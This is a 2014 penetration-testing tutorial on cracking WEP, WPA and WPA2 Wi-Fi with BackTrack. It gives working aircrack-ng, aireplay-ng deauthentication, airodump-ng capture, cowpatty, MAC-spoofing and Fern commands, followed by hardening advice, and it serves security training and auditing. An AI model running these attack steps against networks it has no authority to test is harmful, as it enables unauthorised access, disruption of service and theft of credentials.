WIRELESS PENETRATION TESTING APPROACH TO SECURING CLIENT’S WIRELESS ACCESS POINT

by Saurabh Kumar

Our clients reach to us when wireless access point challenges vague and they are not confident that clients have the internal capability to meet their wireless security controls in a cost effective manner for their organization. What we bring to our clients is our experience providing tested and reliable processes and recommendation to their particular situations.

INTRODUCTION

In the recent evolution of IT technology, wireless technology is one of those, which is adopted by most of the organizations due to their advantages and ease of use.

Security is a main concern for every organization. Almost every organization is using wireless for their communication & data transfer. This internal communication contains lots of sensitive information and if an unauthorized user is able to sniff or connect to the wireless access point, the hacker will be able to retrieve lots of information as now the hacker is a part of the internal network and may impact organizations data confidentiality, integrity, authentication and access control. Hence, securing an organizations wireless network is a key aspect for information security professionals. Although organizations have already implemented security controls for protecting their wireless network, it is also important to check whether they have implemented security controls accurately.

 

WIRELESS PENETRATION TESTING APPROACH

This basically describes the approach for penetrating your wireless strength. This approach uses the password combination & sniffing technique for cracking unsecured wireless network, so a proper set up is required for making the whole process semi-automated and automated.

Here are three key points:

  1. Wireless Penetration tests evaluate the risk related to potential access to your wireless network.


  2. Wireless access points provide a simple way for hackers to penetrate your internal network.


  3. A Wireless Attack & Penetration test will identify vulnerabilities and offer advice for hardening and remediation.


In this article, we will learn 7 most important steps of wireless penetration testing as describing below in details:

  1. Setting up the penetration testing lab and process.

  2. Wireless penetration testing phases tools.

  3. Wireless encryption protocol and initial attack process with their phase tools.

  4. How access point & client communicates with each other.

  5. Wireless cracking technique;

  6. Threats to wireless network;

  7. How to secure wireless networks.

PENETRATION TESTING SET UP AND PROCESS

LAB SETUP:

  1. Laptop/computer with Backtrack installed:


Download Backtrack as per its own requirement 32 bit or 64 bit support.

  1. Backtrack 5R3 ISO/VMware (Recommended)


  2. Backtrack 5R2 ISO/VMware


  3. Backtrack 5R1/5 ISO/VMware


  1. Wireless card:This is the most important step of wireless testing. The card must be supported to Backtrack version you have chosen. Sometimes it’s also possible that the internal card may not be supported, so in that case you will need to use an external wireless card.


You will need a USB Wireless card that can support packet injection and packet sniffing, and that is supported by Backtrack. The best choice seems to be the Alfa AWUS036H card from Alfa Networks.

  1. Password list: The Passphrase provides security encryption for your wireless network. The passphrase can also be referred to as a password, network security key, pre-shared key, or just key.


A Password list is a key for wireless cracking. The more extensive password repository, the greater chance to crack a wireless network. So below are possible scenarios:

  1. Dictionaries and password lists can be as simple or as complex as you want. They can be filled with just random words in all lowercase, or they can be common words and phrases with capitalization, numbers, and symbols.


  2. Use the password list file if it is in repository record.


  3. If not, then one can download an updated password list file, one can search for this file in Google and can download it easily.


Before analyzing the strength of wireless encryption, we need to understand wireless penetration testing tools, different types of encryption protocols, WLAN discovery processes and how to change the mac address in brief.

WIRELESS PENETRATION TESTING PHASE TOOLS:

 

Semi-automated wireless toolkit

  1. Wireless discovery tool:

aerosol, airfart, aphopper, apradar, karma, kismet, ministumbler, netstumbler, wellenreiter, wifi hopper, wirelessmon

 

  1. Packet capture tool:

airopeek, airtraf, apsniff, cain, wireshark

  1. WEP/ WPA password attack tool:

aircrack-ptw, Aircrack-ng, aircrack , airsnort , cowpatty, wep attack, wep crack, Airbase , wzcook

  1. Frame generation software tool:

airgobbler, airpwn, airsnarf, Commview, fake ap, void 11 wifi tap

wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

Fully-automated wireless toolkit

  1. Fern-Wifi-cracker – GUI for testing Wireless encryption strength.

  2. Wi-fihoney – Creates fake APs using all encryption and monitors with airodump.

  3. Wifite – Automated wireless auditor.

WIRELESS ENCRYPTION PROTOCOL AND INTIAL ATTACK PROCESS WITH THEIR PHASE TOOLS:

The following protocols are used in wireless networks to protect information from a system to the wireless router/access point:

  1. WEP: WEP Stands for Wired Equivalent Privacy. This is the first encryption protocol developed for wireless network. It was designed to add security to WLANs. WEP was intended to give wireless networks the equivalent level of privacy of a comparable wired network. The major problem in WEP was that the key was not hashed and was concatenated to the Initialization Vector (IV).


WEP is used at the two lowest layers of the OSI model - the data link and physical layers; it therefore does not offer end-to-end security. Today it is outdated and contains many security weaknesses, but it is possible that some organizations use this protocol for devices, that are not updated on their wireless network.

However, WEP occasionally produces crypto logically weak ciphers that are easily broken with modern tools.

Here is the initial attack process for WEP protocol related:

WLAN discovery->

WEP Unencrypted WLAN (Visible SSID)

  1. Sniff for IP range -

MAC authorized

MAC filtering and

  1. Spoof valid MAC

 

WEP Unencrypted WLAN (Hidden SSID) ->Deauthentication (Deauth) client

  1. aireplay-ng

aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]

  1. commview

Tools > Node re-association

  1. void11

void11_penetration wlan0 -D -t 1 -B [MAC]

WEP encrypted WLAN (Visible SSID)

  1. WEPattack

wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]

  1. Capture / Inject packets -Break WEP

aircrack-ptw

aircrack-ptw [pcap file]

  1. Aircrack-ng

aircrack -q -n [WEP key length] -b [BSSID] [pcap file]

  1. Airsnort

Channel > Start

  1. WEPcrack

perl WEPCrack.pl

./pcap-getIV.pl -b 13 -i wlan0

WEP encrypted WLAN (Hidden SSID) -> Deauthentication (Deauth) client

  1. Aireplay-ng

aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]

  1. Commview

Tool > Node re-association

  1. Void11

void11_hopper

void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]

  1. WPA: WPA Stands for Wi-Fi protected Access. It’s the next generation of WEP. It uses TKIP (Temporal Key Integrity Protocol) which changes keys with every data packet and message integrity check which protects again capturing, modifying and resending of data packets to determine whether the packet is modified or not. For User Authentication it uses EAP (Extensible Authentication Protocol) because in WEP Authentication is done by MAC Address which can be easily sniffed. However in a 4-way handshake during client association it was possible to obtain the hashed network key. WPA is vulnerable for Timing Attack/Dictionary Attack.


 

Here is the initial attack process for WPA protocol related:

 

WLAN discovery-> WPA encrypted WLAN:Deauthentication (Deauth) client ->Capture EAPOL handshake ->WPA attack

  1. Cowpatty

./cowpatty -r [pcap file] -f [wordlist] -s [SSID]

./genpmk -f dictionary_file -d hashfile_name -s ssid

./cowpatty -r cature_file.cap -d hashfile_name -s ssid

  1. Aircrack-ng

aircrack-ng -a 2 -w [wordlist] [pcap file]

  1. WPA2: It is an advanced form of WPA. It is currently one of the most used security protocols. It uses AES (Advanced Encryption Standard) for encryption which is much more secure than TKIP. It supports ad-hoc network too while WPA is limited to infrastructure networks only. It is assumed that AES is not breakable but the only thing which is required is to make your password complex.


There are 2 different types of WPA2 Protocols:

WPA2-PSK: Here PSK is pre shared key. It is designed for a very small network i.e. home

WPA2-ENT: Here ENT is enterprise, so we can say it is made for enterprise. It is much more secure than WPA2-PSK as the passphrase is not stored locally.

Here is the initial attack process for WPA2 protocol related:

 

WLAN discovery-> WPA encrypted WLAN: Deauthentication (Deauth) client -> Capture EAPOL Handshake -> WPA 2 dictionary attack

  1. Cowpatty

./cowpatty -r [pcap file] -f [wordlist] -s [SSID]

./genpmk -f dictionary_file -d hashfile_name -s ssid

./cowpatty -r cature_file.cap -d hashfile_name -s ssid

  1. Aircrack-ng

aircrack-ng -a 2 -w [wordlist] [pcap file]

HOW ACCESS POINT & CLIENT WORKS:

Before cracking wireless network it is essential to know how access point and client interacts with each other.

The first step is to turn on the device with the wireless card and sniff the communication in promiscuous mode using wireshark to capture every packet and then you can understand easily how it works.

Below are requests & responses when wireless communication occurs:

  1. Null Probe Request (Broadcast message): sent by client for searching available wireless networks

  2. Probe Response: Sent by access point

  3. Authentication Request Packet: Client sends a request to access point

  4. Authentication Response: Access points response if it is successful.

  5. Association Request: Client sends a request to access point for talking to each other.

  6. Association Response: Sent by access point to client.

After that data transfer initiates.

WIRELESS CRACKING TECHNIQUE:

This article covers two cracking wireless techniques, semi-automated and fully automated approach.

  1. SEMI-AUTOMATED APPROACH

  1. Make wireless interface up: First step of cracking wireless network is to configure the wireless card and bring wireless interface up.


To do this, use below steps: Plug wireless card (Alfa Card) in virtual machine. After plugging in make sure it’s connected to virtual machine.

Go to VMRemovable Devices Click connect Alfa wireless card

Now run airmon-ng in the virtual machine command prompt/terminal. This will results in the wireless interface being available, now you need to make it up and running. Run if it’s not up:

ifconfig wlan0 up (In this case its wlan0)

 

  1. Change mac address to wireless interface (Optional): While trying to crack a wireless network as a malicious user you want to hide your identity, so you then need to change your MAC address. For this you will need to bring the interface down and then use MAC changer utility/command to change the MAC Address and after changing the MAC Address again bring the interface up.


Use below MAC address changes command and utility:

 

In Linux Operating System-

ifconfig [interface] hw ether [MAC]

macchanger

Random Mac Address: - macchanger -r eth0

In Windows Operating System-

Mac address changer for windows, madmacs, TMAC, SMAC

 

  1. Create monitor (mon0) interface: Prior to looking for networks, must put wireless card into what is called “monitor mode”. Monitor mode is a special mode that allows PC to listen to every wireless packet. This monitor mode also allows to optionally injecting packets into a network.


So here is next stepto create monitor interface to sniff the communication.

Use below command for this:

Airmon-ng start wlan0

This will create a monitor interface mon0 up and running.

sfig1

Figure1.How to start monitor “mon0” interface and bring up

  1. DETECT AVAILABLE WIRELESS NETWORK: Now, It’s time to find our victim. run airodump-ng command to find a wireless victim. This will search available wireless network. these wireless networks will be in different bands and Alfa wireless card works on b & g (802.11b/802.11g) band only.


To filter availablewireless network in band b&g only run below command:

 

airodump-ng --band bg mon0

Here is parameter:--band = band on which airodump-ng should hop

mon0= monitor mode interface

 

After this command, it will start scanning the airspace. Ensure that channel hopping happens across both the 802.11 b and g bands and list the available network. It will display lots of information including various parameters i.e. BSSID, Channel, Power strength etc.

sfig2

Figure2.This display the associated/not associated wireless network with BSSID

Airodump-ng hops from channel to channel and shows all access points it can receive beacons from.

  1. Channels 1 to 14 are used for 802.11b and


  2. 802.11g (in US, they only are allowed to use 1 to 11; 1 to 13 in Europe with some special cases; 1-14 in Japan)


  3. Channels between 36 and 149 are used for 802.11a.


 

Table1.The upper data block shows the access points found:

 

BSSID The MAC address of the Access Point as (Basic Service Set Identifier- its Ethernet address)
PWR Signal strength. Some drivers don't report it
Beacons Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality
Data Number of data frames received
CH Channel the AP is operating on
MB Speed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture
ENC Encryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (don't know yet)
ESSID The network name. Sometimes hidden

 

Table2.The lower data block shows the clients found:

 

BSSID The MAC of the AP this client is associated to
STATION The MAC of the client itself
PWR Signal strength. Some drivers don't report it
Packets Number of data frames received
Probes Network names (ESSIDs) this client has probed
  1. Select target wireless network: Now select victim’s wireless network from the available wireless networks. It is essential to note the specific channel in which victim’s wireless network is running. Also you will need to note its BSSID.


  1. Capture the target packets: After selecting the wireless networks, it’s time to play with victim wireless network and capture the packet.


Run the below command:

Airodump-ng –channel 3 –w captureddata –bssid 00:21:91:d2:8E:25 mon0

Here,

Channel= parameter tune to a channel

w= set the name of capture file (captureddata is a file where the log will save). This will save the packets in .cap extension and save multiple files, just add all their names or use a wildcard such as capturedata*.cap.

BSSID= Victim access point MAC address

mon0= monitor mode interface

It will start capturing the packet but for cracking wireless network we need to capture special ARP Packets. aireplay-ng was able to sniff ARP packets and has started replaying them into the network.

Use below command to capture larger number of packets:

aireplay-ng --arpreplay -e ESSID mon0

On a slow WLAN, capturing the requisite number of weak IVs can take some time. To accelerate the attack,this will start intercepting ARP Packets (an injection/interception rate of 512 packets per second generally results in the required number of IVs being captured between 10 min for 40-bit and 30 min for 128-bit WEP). It’s called replay attack and the greater number of captured ARP Packets the higher the chance of cracking the wireless network, ARP is a fixed header protocol and thus the size of the ARP packet can be easily determined and can be used for identifying them even within encrypted traffic. A replay attack will only work for authenticated and associated client MAC addresses, so for capturing ARP Packet we will send Deauth packet.

Note- WEP misuses these IVs in an exploitable way, and when a certain number of weak IVs have been captured, the WEP key can be determined. Roughly 125,000 packets are required to crack most 40-bit WEP keys, and 200,000-250,000 packets for a 128-bit WEP key.

  1. Deauth (deauthentication) attack: It is also known as a denial of service attack as it will disconnect a client from the access point till the time Deauth packet send. The purpose of sending Deauth packet is to disconnect the client and force it to connect it again so that ARP packet can be captured.


Command for sending Deauth packet:

aireplay-ng --deauth 0 -e XYZ (ESSID Name) mon0

Here is the parameter detail:

XYZ = ESSID Name of victim network

Mon0= interface name

-e essid = for fakeauth attack or injection test, it sets target AP SSID. This is optional

When the SSID is not hidden.

While running the above command it is possible that it may result in a channel error that the Wireless network is running on different channel. Hence, you will need to run this command again against the same channel and then send a Deauth packet.

For Penetration testing purpose you need to connect the mobile device to the wireless network and start sending these packets. At that time you will see the PWR value of that wireless network which will reach to 0 and will the find mobile device disconnected automatically till the time send these packets and then it will automatically connect to that same wireless network.

sfig3

Figure 3.PWR value reached 0 after sending Deauth Packets

  1. Cracking wireless passphrase:

Now encrypted password file captured in “captureddata” and run that file against aircrack-ng using a password file. Remember that this type of attack is only as good as password file.

The default password list included with aircrack-ng on BackTrack named darkcOde.

/pentest/passwords/wordlists/darkc0de

 

  1. Once captured enough number of ARP packets (sufficient number of IVs) then save in .cap file.


  1. Crack the wireless network using aircrack tool as shown in the below command and input .cap file captured packet file.


 

Aircrack-ng captureddata-01.cap

 

  1. It is also possible that it will ask for –w (dictionary file) so need to give the path of dictionary file.


 

Aircrack-ng –w passwordfile captureddata-01.cap

Here,

passwordfile= /pentest/passwords/wordlists/darkc0de

 

After launching above command, it’s time to wait for a Passphrase.

 

  1. Compromise and access of sensitive information: Once the wireless cracking passphrase or key is found, a malicious user will be able to sniff the sensitive information like username, password, and http session id inside the wireless network and can then compromise the complete wireless network.


  1. FULLY-AUTOMATED APPROACH:

This is the best and easiest approach for cracking wireless network. Fern Wi-Fi cracker can crack WEP, WPA, and WPA2 secured wireless networks. Fern basically uses the command line utilities to crack these networks. This tool is in a GUI form where we need to select the victim wireless network only and the rest will be given in an output which will give you the passphrase. This tool will do all of the processes automatically.

Path to access fern cracker inside backtrack directory: /pentest/wireless/fern-wifi-cracker/

To start Fern from the Terminal type in the following commands:

#cd /pentest/wireless/fern-wifi-cracker

#python execute.py

Applications/Backtrack/Exploitation Tools/Wireless Exploitation Tools/WLAN Exploitation/fern-wifi-cracker

 

Fern also provides some extra functionality for hijacking sessions and locating a computers geo-location via its Mac address.

sfig4

Figure4.Fern Wi-Fi Cracker tool

sfig5

Figure5.Fern Wi-Fi Cracker tool with monitor mode (mon0)

After executing the python script the GUI mode of the tool will open. The only thing which is required is to select wireless interface and click on scan for access point. Then select wireless network and click on attack button. The cracking process will start automatically and passphrase will be the output.

Once Fern has captured the handshake it will start the brute force attack. Viola! If the WPA key is in the password list being used it will display the found key in Red.

sfig6

Figure6.Passphrase “password” found using Fern Wi-Fi cracker tool

Back on the Fern main screen is a Key Database button and it now shows one entry.

sf88

Figure7.Passphrase entries in fern key database.

Clicking the Key Database button will display the found keys.

sfig81

Figure8. Passphrase “password” entries in Fern key database

CLOUD PASSWORD CRACKING SERVICE:

There is an online password cracking service for penetration testers and network auditors who need to check the security of WPA protected wireless networks, crack password hashes, or break document encryption.

sfig9

Figure9.Online Cloud based Password Cracking Service

THREATS TO WIRELESS NETWORK

There are below different attack type categories of wireless attacks which can affect CIA- Confidentiality, Integrity and Availability of any organization.

  1. WIRELESS SNIFFING: This is one of the most dangerous attacks in wireless network as a malicious user can obtain the packet during transmission and may be able to see the complete details including the activities of the network. If the traffic is an unencrypted form then a malicious user can get full details of the packet.


  1. MIRROR IMAGE ACCESS POINT: This is a fake access point which is created by a malicious user after getting information of a public access point. A malicious user creates an access point with a stronger signal than the real access point and broadcast it. User will connect the strongest signal and thus become victim.


 

  1. AD-HOC NETWORK: This is the simplest attack to launch. A malicious user can connect to your ad hoc network and can gain access to sensitive files.


 

  1. BUFFER OVERFLOW: It allows a malicious user to exploit vulnerabilities in software code (Various OS/Application present) to have escalated privileges on the target machine.


 

  1. REMOTE CONTROL SOFTWARE: It allows a malicious user to install software to remote control the target machine and compromise the network.


 

  1. VIRUS/WORM/SPYWARE: Malicious code that exploits system vulnerabilities to gain privilege access or to manipulate data.


  1. ARP REDIRECTION/SPOOFING: This attack is also called MAC spoofing which allows a malicious user to redirect network traffic to his/her system.


  1. DENIAL OF SERIVCE ATTACK: It is also known as deauthentication attack as it will disconnect a client from the access point till the time Deauth packet send. This attack will disconnect the wireless service produce an unavailability of the resource.


 

HOW TO SECURE WIRELESS NETWORKS

  1. Locate access point devices at right place: Implement the access point device in the way that it should be accessible to most of your users and provide good signal strength to them. The advantage of this is that it will prevent the signal leakage outside. It is also recommended to manage the signal strength of wireless network on the basis of organization internal users/ area range.


  2. Use strong encryption algorithm: It is highly recommended to use strong encryption algorithm with a combination of strong password policy i.e. minimum of 8 characters with at least one upper case, one lower case and one special character.


Organization should not use SSID name as their organization name and also change their SSID Periodically. In case if their SSID is hacked then after changing the SSID it will become unusable.

  1. Change Default Settings: It is advisable to change the default settings i.e. default password, encryption key, SNMP Weak strings and if weak algorithm is used then change it to higher one.


  2. SSID Security: Broadcasting SSID is a honey cake for an attacker. This saves the time of an attacker and helps to concentrate on the attack.


  3. Authentication Verification: It is recommended to verify the authentication before granting access. This authentication can also be done in terms of MAC/IP Verification although one can spoof IP/MAC. The best solution is implementing RADIUS Server for authenticating the user.


  4. Access Point Update: It is highly recommended to update your access point software time to time so it will mitigate the vulnerability exist in previous version of the software and thus reducing the chance of attack.


  5. Logging: Logging is a way which helps an organization to find out the attack pattern.


  6. Securing Guest Access: Sometimes it’s essential for an organization to provide guest access of their wireless network. In this case it is recommended to provide separate access point for those and if not then authenticate those users before giving access to the wireless network. This authentication should be in terms of mobile number SMS etc.


  7. Wireless Audit: Wireless audit is a term which is done by the external vendors to analyze the security strength of your wireless network. The outcome of this exercise includes availability of unauthorized devices in the network, security policy gaps etc.


  8. Security Awareness: It is also a one of the key factor to protect wireless network. It’s an organization responsibility to promote awareness of wireless security and its impact to their employees.


  9. Wireless IDS/IPS: It is recommended to implement wireless IDS/IPS with a secure configuration so that it can monitor all the traffic and generate an alert if any suspicious activity detects. It should also monitor the wireless devices and report if any of them are missing.


SUMMARY:

In this article, as we have seen above, the 7 must do's are necessary to learn wireless penetration testing, we recommend to follow these 7 must do's. We have observed during practical wireless testing these steps help to our clients to find weakness of wireless network and secure WLAN network.

We have learned in details following wireless penetration testing concepts:

  1. How to set up wireless lab, together with detailed instructions;


  2. Key observations about WLAN protocols;


  3. How to conduct wireless attacks using wireless as the base;


  4. How to conduct a wireless penetration test using Backtrack and other open


Source tools;

  1. How access point & client communicates with each other.


  2. What are threats to wireless network;


  3. How to secure wireless networks.


ARTICLE’s ACRONYMS:

EAPOL– Extensible authentication protocol over LAN

USB- Universal serial bus

WEP- Wired equivalent privacy

WAP- Wireless application protocol

WLAN- Wireless local area network

PSK- Pre shared key

ENT- Enterprise

MAC address- Media access control address (MAC address)

SSID- Service set identifier 

AES- Advanced encryption standard

TKIP- Temporal key integrity protocol

EAP- Extensible authentication protocol

BSSID- Basic service set identification

ESSID- Extended service set identification 

ARP- Address resolution protocol

AP- Access point

IVs- Initialization vectors

IP- Internet protocol

 

 

REFERENCES:

Mailing Lists: Securityfocus.com has mailing lists, which are focused groups for technical discussions. It is recommended to subscribe the [email protected] to stay in touch with the latest updates in the field.

Websites: The Aircrack-NG site is the best resource to stay updated on new tools for wireless penetration testing:

  1. http://www.aircrack-ng.org


Among wireless PT website is Raul Siles' website which contains a detailed list of tools, papers, research articles, conference materials, and much more, all dedicated to wireless security:

  1. http://www.raulsiles.com/resources/wifi.html


Joshua Wright's blog, though not very regularly updated, is the definitive place for the latest on WPA-Enterprise attacks:

  1. http://www.willhackforsushi.com/


Wireless Password list can be downloading from the following link:

  1. http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/


Conferences: Hacker and Security conferences such as Defcon and Blackhat have excellent talks and workshops each year on various topics in security, including wireless security. Most of these talk videos and course materials are released free of charge online. It would be good to follow these conferences:

  1. Defcon: http://www.defcon.org


  2. Blackhat: http://www.blackhat.com


BackTrack-Related: BackTrack as a platform is evolving constantly. It's important to ensure that BackTrack copy is always the latest and greatest! The following websites are the first place for any release announcements:

  1. BackTrack website: http://www.backtrack-linux.org


  2. Offensive security: http://www.offensive-security.com


Other Open Source Tools:

  1. http://www.codeproject.com/Articles/10493/MAC-Address-Changer-for-Windows-XP-2003


  2. https://code.google.com/p/fern-wifi-cracker/


  3. https://www.cloudcracker.com/#!/handshake


About the Author:

I have been working in the IT Security domain since 2007 and acquired know ledge and practical experience in infrastructure security, network security, web application security, mobile application security and security operation center as malware analysis. I have received several certifications as GCIA, ECSA, CHFI and ECSA. I have completed certification course CNSS from CDAC (Dept. of IT and Communication ministry, India). I am working with Protiviti, Middle East region as a Senior Security Consultant at Kuwait City. Prior to Protiviti, I have spent 5 years with big security firm as Symantec, HCL and Aujas. A more complete of my profile can be accessed over kw.linkedin.com/pub/sau rabh-porwal/15/598/347/.

 

1. Hope you enjoyed this article and the different exercises in it. Hopefully, by now you should be able to conduct penetration tests on wireless networks with ease using wireless penetration testing tools. Our final advice to you would be always being a reader and keep learning! This is what will keep you sharper than the rest of the competition.

2. Tools used in this article are available in links provided in reference or can be found over internet easily.

3. We wish you all the best for a career in wireless penetrating testing.

September 4, 2014
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013